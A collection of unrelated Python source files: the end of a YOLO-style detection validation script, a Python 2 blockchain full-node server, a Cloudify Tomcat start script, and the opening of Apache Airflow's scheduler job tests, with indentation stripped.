names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
s = ('%20s' + '%11s' * 8) % ('Class', 'Images', 'Labels', 'Boxes', 'P', 'R', '[email protected]', '[email protected]', '[email protected]:.95')
dt, p, r, f1, mp, mr, map50, map, wap50 = [0.0, 0.0, 0.0], 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
loss = torch.zeros(3, device=device)
stats, ap, ap_class = [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t1 = time_sync()
# Preprocess
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0
for i in range(num_class):
num_per_class[i] += len(np.where(targets[:, 1] == i)[0])
targets = targets.to(device)
batch_size, _, height, width = img.shape # batch size, channels, height, width
t2 = time_sync()
dt[0] += t2 - t1
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
dt[1] += time_sync() - t2
# Compute loss
if compute_loss:
# box, obj, cls
loss += compute_loss([x.float() for x in train_out], targets)[1]
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(batch_size)] if save_hybrid else []
t3 = time_sync()
# Note depth 8 -> 6
out = non_max_suppression(out, conf_threshold, iou_threshold, labels=lb, multi_label=True)
dt[2] += time_sync() - t3
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
target_class = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, num_thresholds, dtype=torch.bool),
torch.Tensor(), torch.Tensor(), target_class))
continue
normed_pred = pred.clone()
scale_coords(img[si].shape[1:], normed_pred[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
target_boxes = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], target_boxes, shape, shapes[si][1]) # native-space labels
labels_per_img = torch.cat((labels[:, 0:1], target_boxes), 1) # native-space labels
correct = process_batch(normed_pred, labels_per_img, iou_thresholds)
if plots:
confusion_matrix.process_batch(normed_pred, labels_per_img)
else:
correct = torch.zeros(pred.shape[0], num_thresholds, dtype=torch.bool)
# correct, confidence, pred_label, target_label
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), target_class))
# Save/log
if save_txt:
save_one_txt(normed_pred, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
callbacks.run('on_val_image_end', pred, normed_pred, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)]
# Count detected boxes per class
boxes_per_class = np.bincount(stats[2].astype(np.int64), minlength=num_class)
ap50 = None
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # [email protected], [email protected]:0.95
mp, mr, wap50, map50, map = p.mean(), r.mean(), cal_weighted_ap(ap50), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=num_class) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
print_format = '%20s' + '%11i' * 3 + '%11.3g' * 5 # print format
print(print_format % ('all', seen, nt.sum(), sum(boxes_per_class), mp, mr, wap50, map50, map))
# Print results per class
if (verbose or (num_class < 50 and not is_loaded_model)) and num_class > 1 and len(stats):
for i, c in enumerate(ap_class):
print(print_format % (names[c], num_per_class[i], nt[c],
boxes_per_class[i], p[i], r[i], ap50[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in dt)
if not is_loaded_model:
shape = (batch_size, 3, img_size, img_size)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
callbacks.run('on_val_end')
# Return results
model.float()
if not is_loaded_model:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {colorstr('bold', save_dir)}{s}")
maps = np.zeros(num_class) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, wap50, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parser():
args = argparse.ArgumentParser(prog='val.py')
args.add_argument('--data', type=str, default='config/data_cfg.yaml', help='dataset.yaml path')
args.add_argument('--weights', type=str, help='specify your weight path', required=True)
args.add_argument('--task', help='train, val, test', required=True)
args.add_argument('--name', help='save to project/name', required=True)
args.add_argument('--batch-size', type=int, default=64, help='batch size')
args.add_argument('--device', default='cpu', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
args = args.parse_args()
args.img_size = 640
args.conf_threshold = 0.001
args.iou_threshold = 0.6
args.augment = False
args.exist_ok = False
args.half = False
args.project = 'results/evaluate/' + args.task
args.save_conf = False
args.save_hybrid = False
args.save_txt = False
args.verbose = False
args.plots = True
args.save_txt |= args.save_hybrid
args.data = check_yaml(args.data)
return args
def main(args):
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(args).items()))
if args.task in ('train', 'val', 'test'): # run normally
run(**vars(args))
if __name__ == "__main__":
main(parser())
|
node.py
|
import grequests
import requests
from blockchain import *
from klein import Klein
FULL_NODE_PORT = "30013"
NODES_URL = "http://{}:{}/nodes"
TRANSACTIONS_URL = "http://{}:{}/transactions"
BLOCK_URL = "http://{}:{}/block/{}"
BLOCKS_RANGE_URL = "http://{}:{}/blocks/{}/{}"
BLOCKS_URL = "http://{}:{}/blocks"
TRANSACTION_HISTORY_URL = "http://{}:{}/address/{}/transactions"
BALANCE_URL = "http://{}:{}/address/{}/balance"
class NodeMixin(object):
# TODO: store the nodes in an external configuration file
full_nodes = {"127.0.0.1"}
def request_nodes(self, node, port):
url = NODES_URL.format(node, port)
try:
response = requests.get(url)
if response.status_code == 200:
all_nodes = response.json()
return all_nodes
except requests.exceptions.RequestException as re:
pass
return None
def request_nodes_from_all(self):
full_nodes = self.full_nodes.copy()
bad_nodes = set()
for node in full_nodes:
all_nodes = self.request_nodes(node, FULL_NODE_PORT)
if all_nodes is not None:
full_nodes = full_nodes.union(all_nodes["full_nodes"])
else:
bad_nodes.add(node)
self.full_nodes = full_nodes
for node in bad_nodes:
self.remove_node(node)
return
def remove_node(self, node):
# nodeset.discard(node)
pass
def broadcast_transaction(self, transaction):
self.request_nodes_from_all()
bad_nodes = set()
data = {
"transaction": transaction
}
for node in self.full_nodes:
url = TRANSACTIONS_URL.format(node, FULL_NODE_PORT)
try:
response = requests.post(url, json=data)
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
bad_nodes.clear()
return
# convert to grequests and return list of responses
class FullNode(NodeMixin):
NODE_TYPE = "full"
blockchain = None
app = Klein()
def __init__(self, host, reward_address, block_path=None):
self.host = host
self.request_nodes_from_all()
self.reward_address = reward_address
self.broadcast_node(host)
self.full_nodes.add(host)
if block_path is None:
self.blockchain = Blockchain()
else:
self.load_blockchain(block_path)
thread = threading.Thread(target=self.mine, args=())
thread.daemon = True
thread.start()
print "\n\nfull node server started...\n\n"
self.app.run(host, FULL_NODE_PORT)
def request_block(self, node, port, index="latest"):
url = BLOCK_URL.format(node, port, index)
try:
response = requests.get(url)
if response.status_code == 200:
block_dict = json.loads(response.json())
block = Block(
block_dict['index'],
block_dict['transactions'],
block_dict['previous_hash'],
block_dict['current_hash'],
block_dict['timestamp'],
block_dict['nonce']
)
return block
except requests.exceptions.RequestException as re:
pass
return None
def request_block_from_all(self, index="latest"):
blocks = []
full_nodes = self.full_nodes.copy()
bad_nodes = set()
for node in full_nodes:
block = self.request_block(node, FULL_NODE_PORT, index)
if block is not None:
blocks.append(block)
else:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
return blocks
def request_blocks_range(self, node, port, start_index, stop_index):
url = BLOCKS_RANGE_URL.format(node, port, start_index, stop_index)
blocks = []
try:
response = requests.get(url)
if response.status_code == 200:
blocks_dict = json.loads(response.json())
for block_dict in blocks_dict:
block = Block(
block_dict['index'],
block_dict['transactions'],
block_dict['previous_hash'],
block_dict['current_hash'],
block_dict['timestamp'],
block_dict['nonce']
)
blocks.append(block)
return blocks
except requests.exceptions.RequestException as re:
pass
return None
def request_blockchain(self, node, port):
url = BLOCKS_URL.format(node, port)
blocks = []
try:
response = requests.get(url)
if response.status_code == 200:
blocks_dict = json.loads(response.json())
for block_dict in blocks_dict:
block = Block(
block_dict['index'],
block_dict['transactions'],
block_dict['previous_hash'],
block_dict['current_hash'],
block_dict['timestamp'],
block_dict['nonce']
)
blocks.append(block)
return blocks
except requests.exceptions.RequestException as re:
pass
return None
def mine(self):
print "\n\nmining started...\n\n"
while True:
latest_block = self.blockchain.get_latest_block()
latest_hash = latest_block.current_hash
latest_index = latest_block.index
block = self.blockchain.mine_block(self.reward_address)
if not block:
continue
statuses = self.broadcast_block(block)
if statuses['expirations'] > statuses['confirmations'] or \
statuses['invalidations'] > statuses['confirmations']:
self.synchronize()
new_latest_block = self.blockchain.get_latest_block()
if latest_hash != new_latest_block.current_hash or \
latest_index != new_latest_block.index:
#latest_block changed after sync.. don't add the block.
self.blockchain.recycle_transactions(block)
continue
self.blockchain.add_block(block)
def broadcast_block(self, block):
#TODO convert to grequests and concurrently gather a list of responses
statuses = {
"confirmations": 0,
"invalidations": 0,
"expirations": 0
}
self.request_nodes_from_all()
bad_nodes = set()
data = {
"block": block.to_json(),
"host": self.host
}
for node in self.full_nodes:
if node == self.host:
continue
url = BLOCKS_URL.format(node, FULL_NODE_PORT)
try:
response = requests.post(url, json=data)
if response.status_code == 202:
# confirmed and accepted by node
statuses["confirmations"] += 1
elif response.status_code == 406:
# invalidated and rejected by node
statuses["invalidations"] += 1
elif response.status_code == 409:
# expired and rejected by node
statuses["expirations"] += 1
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
bad_nodes.clear()
return statuses
def add_node(self, host):
if host == self.host:
return
if host not in self.full_nodes:
self.broadcast_node(host)
self.full_nodes.add(host)
def broadcast_node(self, host):
self.request_nodes_from_all()
bad_nodes = set()
data = {
"host": host
}
for node in self.full_nodes:
if node == self.host:
continue
url = NODES_URL.format(node, FULL_NODE_PORT)
try:
requests.post(url, json=data)
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
for node in bad_nodes:
self.remove_node(node)
bad_nodes.clear()
return
def load_blockchain(self, block_path):
# TODO load blockchain from path
pass
def synchronize(self):
my_latest_block = self.blockchain.get_latest_block()
"""
latest_blocks = {
index1 : {
current_hash1 : [node1, node2],
current_hash2 : [node3]
},
index2 : {
current_hash3 : [node4]
}
}
"""
latest_blocks = {}
self.request_nodes_from_all()
bad_nodes = set()
for node in self.full_nodes:
url = BLOCK_URL.format(node, FULL_NODE_PORT, "latest")
try:
response = requests.get(url)
if response.status_code == 200:
remote_latest_block = response.json()
if remote_latest_block["index"] <= my_latest_block.index:
continue
if latest_blocks.get(remote_latest_block["index"], None) is None:
latest_blocks[remote_latest_block["index"]] = {
remote_latest_block["current_hash"]: [node]
}
continue
if latest_blocks[remote_latest_block["index"]].get(remote_latest_block["current_hash"], None) is None:
latest_blocks[remote_latest_block["index"]][remote_latest_block["current_hash"]] = [node]
continue
latest_blocks[remote_latest_block["index"]][remote_latest_block["current_hash"]].append(node)
except requests.exceptions.RequestException as re:
bad_nodes.add(node)
if len(latest_blocks) > 0:
for latest_block in sorted(latest_blocks.items(), reverse=True):
index = latest_block[0]
current_hashes = latest_block[1]
success = True
for current_hash in current_hashes:
remote_host = current_hash[1][0]
remote_diff_blocks = self.request_blocks_range(
remote_host,
FULL_NODE_PORT,
my_latest_block.index + 1,
index
)
if remote_diff_blocks[0].previous_hash == my_latest_block.current_hash:
# first block in diff blocks fit local chain
for block in remote_diff_blocks:
result = self.blockchain.add_block(block)
if not result:
success = False
break
else:
# first block in diff blocks does not fit local chain
for i in range(my_latest_block.index, 1, -1):
# step backwards and look for the first remote block that fits the local chain
block = self.request_block(remote_host, FULL_NODE_PORT, str(i))
remote_diff_blocks[0:0] = [block]
if block.previous_hash == self.blockchain.get_block_by_index(i-1):
# found the fork
result = self.blockchain.alter_chain(remote_diff_blocks)
success = result
break
success = False
if success:
break
if success:
break
return
@app.route('/nodes', methods=['POST'])
def post_node(self, request):
body = json.loads(request.content.read())
self.add_node(body['host'])
return json.dumps({'success': True})
@app.route('/nodes', methods=['GET'])
def get_nodes(self, request):
nodes = {
"full_nodes": list(self.full_nodes)
}
return json.dumps(nodes)
@app.route('/transactions', methods=['POST'])
def post_transactions(self, request):
body = json.loads(request.content.read())
return json.dumps({'success': self.blockchain.push_unconfirmed_transaction(body['transaction'])})
@app.route('/transactions', methods=['GET'])
def get_transactions(self, request):
return json.dumps(self.blockchain.get_all_unconfirmed_transactions())
@app.route('/address/<address>/balance', methods=['GET'])
def get_balance(self, request, address):
return json.dumps(self.blockchain.get_balance(address))
@app.route('/address/<address>/transactions', methods=['GET'])
def get_transaction_history(self, request, address):
return json.dumps(self.blockchain.get_transaction_history(address))
@app.route('/blocks', methods=['POST'])
def post_block(self, request):
body = json.loads(request.content.read())
remote_block = json.loads(body['block'])
remote_host = body['host']
block = Block(
remote_block['index'],
remote_block['transactions'],
remote_block['previous_hash'],
remote_block['current_hash'],
remote_block['timestamp'],
remote_block['nonce']
)
my_latest_block = self.blockchain.get_latest_block()
if block.index > my_latest_block.index + 1:
# new block index is greater than ours
remote_diff_blocks = self.request_blocks_range(
remote_host,
FULL_NODE_PORT,
my_latest_block.index + 1,
remote_block['index']
)
if remote_diff_blocks[0].previous_hash == my_latest_block.current_hash:
# first block in diff blocks fit local chain
for block in remote_diff_blocks:
result = self.blockchain.add_block(block)
if not result:
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'block {} rejected'.format(block.index)})
request.setResponseCode(202) # accepted
return json.dumps({'message': 'accepted'})
else:
# first block in diff blocks does not fit local chain
for i in range(my_latest_block.index, 1, -1):
# step backwards and look for the first remote block that fits the local chain
block = self.request_block(remote_host, FULL_NODE_PORT, str(i))
remote_diff_blocks[0:0] = [block]
if block.previous_hash == self.blockchain.get_block_by_index(i-1):
# found the fork
result = self.blockchain.alter_chain(remote_diff_blocks)
if not result:
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'blocks rejected'})
request.setResponseCode(202) # accepted
return json.dumps({'message': 'accepted'})
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'blocks rejected'})
elif block.index <= my_latest_block.index:
# new block index is less than ours
request.setResponseCode(409) # conflict
return json.dumps({'message': 'Block index too low. Fetch latest chain.'})
# correct block index. verify txs, hash
result = self.blockchain.add_block(block)
if not result:
request.setResponseCode(406) # not acceptable
return json.dumps({'message': 'block {} rejected'.format(block.index)})
request.setResponseCode(202) # accepted
return json.dumps({'message': 'accepted'})
@app.route('/blocks', methods=['GET'])
def get_blocks(self, request):
return json.dumps([block.__dict__ for block in self.blockchain.get_all_blocks()])
@app.route('/blocks/<start_block_id>/<end_block_id>', methods=['GET'])
def get_blocks_range(self, request, start_block_id, end_block_id):
return json.dumps([block.__dict__ for block in self.blockchain.get_blocks_range(start_block_id, end_block_id)])
@app.route('/block/<block_id>', methods=['GET'])
def get_block(self, request, block_id):
if block_id == "latest":
return json.dumps(self.blockchain.get_latest_block().__dict__)
return json.dumps(self.blockchain.get_block_by_index(block_id).__dict__)
if __name__ == "__main__":
pass
|
_a4c_start.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
env_map['TOMCAT_HOME'] = r'/opt/tomcat'
env_map['TOMCAT_PORT'] = r'80'
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/Tomcat/tosca.interfaces.node.lifecycle.Standard/start/tomcat_start.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.instance.runtime_properties['_a4c_OO:tosca.interfaces.node.lifecycle.Standard:start:{0}'.format(k)] = v
ctx.instance.runtime_properties['server_url'] = r'http://' + get_attribute(ctx, 'public_ip_address') + r':' + r'80'
ctx.instance.update()
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors
from airflow.models.slamiss import SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
